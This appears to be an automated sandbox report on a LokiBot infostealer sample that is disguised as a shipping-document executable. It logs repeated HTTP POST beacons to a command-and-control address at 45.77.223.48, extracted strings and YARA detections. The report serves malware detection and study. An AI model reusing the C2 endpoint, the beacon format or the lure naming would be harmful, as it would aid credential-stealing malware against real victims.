Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Code function: 3_2_00404ED4 recv,

3_2_00404ED4

Source: unknown

HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 176Connection: close

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000003.00000002.2873103232.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000003.00000002.2872695096.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://45.77.223.48/~blog/?ajax=ee
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
